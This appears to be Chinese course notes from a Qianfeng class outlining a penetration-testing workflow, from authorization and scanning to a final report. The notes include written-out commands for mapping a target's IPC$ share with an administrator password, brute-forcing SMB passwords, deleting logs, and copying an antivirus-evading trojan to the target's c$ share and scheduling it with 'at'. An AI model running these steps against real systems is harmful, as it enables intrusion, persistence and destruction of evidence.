【千峰】7、渗透测试流程

渗透测试流程

拿到最高权限

0.授权

1.信息收集

​ nslookup whois

2.扫描漏洞

​ nmap —— ip范围，端口 80（IIS，Apache，什么网站）

​ 高级扫描：中间件漏洞，如IIS漏洞（版本2003-6.0，2008-7.0）

​ 扫描网站漏洞

​

telnet IP地址 端口号  #手工测试端口开放

​

3.漏洞利用

445漏洞利用之IPC$：

net use 盘符 \\由共享文件的IP地址\共享文件夹名 对方账户密码 /user:对方账号   #将共享文件夹映射到本地
net use f: \\10.1.1.2\share 123.com /user:administrator
net use #查看所有映射
net use f: /del #删除f盘这个映射

net time \\ip地址  #查看对方时间
at \\ip地址 时间 "要执行的地址"  #定时运行，此IP
at \\ip地址  #查看此IP计划任务列表    AT 命令已弃用。请改用 schtasks.exe。

利用

net use \\10.1.1.2\ipc$ 密码 /user:用户名

暴力破解系统密码之445（小工具：NTscan10、真空密码字典生成器、亦思社会工程学字典生成器）

4.提权（sell环境、桌面环境、最高权限）

5.毁尸灭迹

删除日志

6.留后门

鸽子牧民战天免杀专版0912

copy 木马文件 \\ip地址\c$

设置计划任务自行执行木马

net time \\ip地址  #查看对方时间
at \\ip地址 时间 "要执行的地址"  #定时运行，此IP
at \\ip地址  #查看此IP计划任务列表    AT 命令已弃用。请改用 schtasks.exe。

7.渗透测试报告